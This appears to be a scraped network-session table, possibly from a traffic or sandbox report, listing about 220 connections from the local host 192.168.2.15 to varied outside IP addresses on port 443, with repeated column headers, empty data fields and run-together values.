                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12528192.168.2.1534548184.113.104.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12529192.168.2.155783440.221.213.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12530192.168.2.154223254.77.170.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12531192.168.2.1550832119.19.193.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12532192.168.2.1534594205.244.97.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12533192.168.2.155438241.104.75.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12534192.168.2.1556548216.86.77.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12535192.168.2.1540778183.135.241.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12536192.168.2.1560236199.11.27.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12537192.168.2.155693869.95.8.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12538192.168.2.1549304141.22.65.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12539192.168.2.155478682.91.36.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12540192.168.2.154544486.205.201.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12541192.168.2.1556504181.153.144.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12542192.168.2.154937418.170.170.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12543192.168.2.156071254.17.27.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12544192.168.2.1560576129.94.174.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12545192.168.2.154684431.121.65.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12546192.168.2.154826067.152.86.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12547192.168.2.1536736106.129.162.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12548192.168.2.1536684188.52.231.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12549192.168.2.155588450.55.55.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12550192.168.2.1545508157.140.78.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12551192.168.2.154872079.176.214.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12552192.168.2.15432128.251.84.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12553192.168.2.1555158206.97.100.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12554192.168.2.1545922133.104.233.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12555192.168.2.155497819.80.149.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12556192.168.2.1535742210.118.15.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12557192.168.2.1559428143.230.250.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12558192.168.2.15448984.251.8.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12559192.168.2.1546550172.218.79.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12560192.168.2.154019012.244.85.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12561192.168.2.153455694.108.174.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12562192.168.2.1560238162.182.71.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12563192.168.2.1539398115.159.137.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12564192.168.2.1539328163.163.117.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12565192.168.2.154053244.149.177.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12566192.168.2.1538550116.187.102.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12567192.168.2.1552012206.249.195.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12568192.168.2.155762070.50.45.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12569192.168.2.1557386182.72.161.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12570192.168.2.153972695.25.151.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12571192.168.2.1534012206.184.93.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12572192.168.2.1554366186.165.234.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12573192.168.2.1550798145.54.2.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12574192.168.2.1548298218.219.169.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12575192.168.2.1547144116.84.17.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12576192.168.2.1557534121.23.147.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12577192.168.2.1548456175.155.145.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12578192.168.2.154559659.24.49.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12579192.168.2.1543842188.5.42.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12580192.168.2.1560718168.111.2.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12581192.168.2.1552290185.113.6.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12582192.168.2.1545308196.133.140.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12583192.168.2.1536520158.119.142.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12584192.168.2.1557002186.139.135.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12585192.168.2.1542896196.232.218.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12586192.168.2.155974291.13.103.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12587192.168.2.1536860213.87.84.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12588192.168.2.153502844.173.157.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12589192.168.2.1537414196.111.152.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12590192.168.2.1535760170.93.239.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12591192.168.2.1543838175.54.56.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12592192.168.2.1533798142.207.0.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12593192.168.2.154030647.230.125.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12594192.168.2.1534006177.206.45.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12595192.168.2.1556984222.73.222.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12596192.168.2.153756646.1.234.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12597192.168.2.1546658208.89.244.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12598192.168.2.1560054111.224.77.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12599192.168.2.1536112177.152.177.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12600192.168.2.1532988168.106.51.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12601192.168.2.1538992179.97.171.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12602192.168.2.1553658199.166.28.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12603192.168.2.155856092.80.87.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12604192.168.2.15577448.120.122.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12605192.168.2.1533330223.212.207.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12606192.168.2.1552510201.150.149.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12607192.168.2.1539818144.7.254.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12608192.168.2.1536724143.234.116.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12609192.168.2.155768413.161.175.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12610192.168.2.155330447.131.57.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12611192.168.2.1557878188.152.164.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12612192.168.2.155163886.189.132.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12613192.168.2.1554352195.116.255.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12614192.168.2.153726089.32.117.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12615192.168.2.153913013.154.82.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12616192.168.2.1559562143.9.150.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12617192.168.2.153675818.113.184.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12618192.168.2.154368681.171.60.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12619192.168.2.153435839.46.203.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12620192.168.2.155613843.3.223.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12621192.168.2.1535548210.34.174.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12622192.168.2.1546768143.195.121.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12623192.168.2.15367068.202.53.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12624192.168.2.1557646142.0.142.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12625192.168.2.154959272.91.183.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12626192.168.2.1559514168.110.165.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12627192.168.2.154041284.76.2.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12628192.168.2.1557062167.182.78.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12629192.168.2.153496468.100.103.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12630192.168.2.1549164151.200.134.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12631192.168.2.1549358192.145.217.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12632192.168.2.155334658.136.173.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12633192.168.2.1557832172.64.15.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12634192.168.2.155558263.206.89.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12635192.168.2.1557582107.83.129.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12636192.168.2.1535214189.36.199.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12637192.168.2.1533738194.148.189.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12638192.168.2.1556578220.181.244.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12639192.168.2.153555681.119.112.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12640192.168.2.153300427.128.43.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12641192.168.2.1554872161.234.149.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12642192.168.2.1538132213.52.128.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12643192.168.2.1547894130.42.117.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12644192.168.2.156049670.117.139.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12645192.168.2.1554016139.108.245.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12646192.168.2.1540756137.157.82.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12647192.168.2.1551364148.162.47.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12648192.168.2.1549936157.11.113.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12649192.168.2.1550634158.189.143.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12650192.168.2.1541976171.39.204.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12651192.168.2.1555370211.247.90.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12652192.168.2.1540436208.22.186.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12653192.168.2.1547032146.223.89.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12654192.168.2.1542088217.216.6.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12655192.168.2.155050890.134.171.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12656192.168.2.153703241.52.148.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12657192.168.2.1550318120.236.125.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12658192.168.2.155510691.135.224.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12659192.168.2.155873625.13.10.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12660192.168.2.1545756117.65.250.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12661192.168.2.1556780201.1.230.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12662192.168.2.155585848.104.53.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12663192.168.2.155955036.77.251.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12664192.168.2.1534484211.142.47.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12665192.168.2.1548880223.12.6.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12666192.168.2.1557010217.89.94.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12667192.168.2.154070872.153.82.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12668192.168.2.153678612.124.52.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12669192.168.2.1554908157.93.100.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12670192.168.2.1548828192.169.66.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12671192.168.2.155953037.105.122.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12672192.168.2.153489027.83.29.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12673192.168.2.1555606161.16.140.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12674192.168.2.1551504221.224.149.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12675192.168.2.1550980138.128.196.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12676192.168.2.155828683.234.40.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12677192.168.2.1536564141.209.100.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12678192.168.2.1551150199.35.241.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12679192.168.2.1540878184.128.118.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12680192.168.2.1541114200.48.82.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12681192.168.2.154977875.51.208.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12682192.168.2.1541206131.120.201.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12683192.168.2.1549664166.137.18.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12684192.168.2.1545206129.153.3.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12685192.168.2.155746051.116.206.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12686192.168.2.1554162123.89.109.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12687192.168.2.1543770104.183.51.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12688192.168.2.15336069.165.39.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12689192.168.2.155789650.186.90.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12690192.168.2.1553546187.240.89.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12691192.168.2.1551634107.102.16.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12692192.168.2.1536622119.41.196.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12693192.168.2.1558974104.233.214.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12694192.168.2.1560050146.134.86.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12695192.168.2.1547270201.68.221.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12696192.168.2.154117258.87.114.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12697192.168.2.1540952146.6.155.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12698192.168.2.1555700181.58.77.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12699192.168.2.153543245.160.173.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12700192.168.2.155461435.205.136.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12701192.168.2.1550978206.42.103.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12702192.168.2.154699681.82.178.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12703192.168.2.155812862.237.165.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12704192.168.2.1552948114.69.229.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12705192.168.2.1545250159.58.16.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12706192.168.2.154979495.225.223.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12707192.168.2.1548816159.196.105.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12708192.168.2.1534792101.199.176.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12709192.168.2.154115668.225.221.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12710192.168.2.1547202213.42.16.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12711192.168.2.1558588126.164.17.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12712192.168.2.1535704141.8.245.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12713192.168.2.153909652.15.242.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12714192.168.2.1539666204.248.249.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12715192.168.2.155867477.26.244.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12716192.168.2.154556425.85.230.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12717192.168.2.1552120121.15.113.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12718192.168.2.1556986210.167.131.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12719192.168.2.1549314117.7.68.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12720192.168.2.154646841.186.28.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12721192.168.2.153347487.136.25.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12722192.168.2.1546136140.32.109.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12723192.168.2.1556834180.198.64.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12724192.168.2.153924066.40.32.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12725192.168.2.1541954111.69.130.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12726192.168.2.1553982161.210.50.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12727192.168.2.1553440213.188.61.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12728192.168.2.154755853.122.253.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12729192.168.2.1533122217.177.211.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12730192.168.2.1537330190.194.150.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12731192.168.2.1533168137.147.196.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12732192.168.2.1536498205.194.16.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12733192.168.2.155244648.100.117.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12734192.168.2.1545894219.125.168.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12735192.168.2.1560992149.254.152.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12736192.168.2.1549366188.203.12.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12737192.168.2.156075444.53.203.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12738192.168.2.1542368131.252.95.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12739192.168.2.1548354124.100.209.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12740192.168.2.154184681.198.131.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12741192.168.2.1558574152.70.107.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12742192.168.2.1540270154.127.228.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12743192.168.2.156002051.166.21.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12744192.168.2.1534230212.240.127.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12745192.168.2.154621637.61.147.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12746192.168.2.1553472170.138.80.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12747192.168.2.15569561.229.195.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12748192.168.2.1545090210.64.172.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
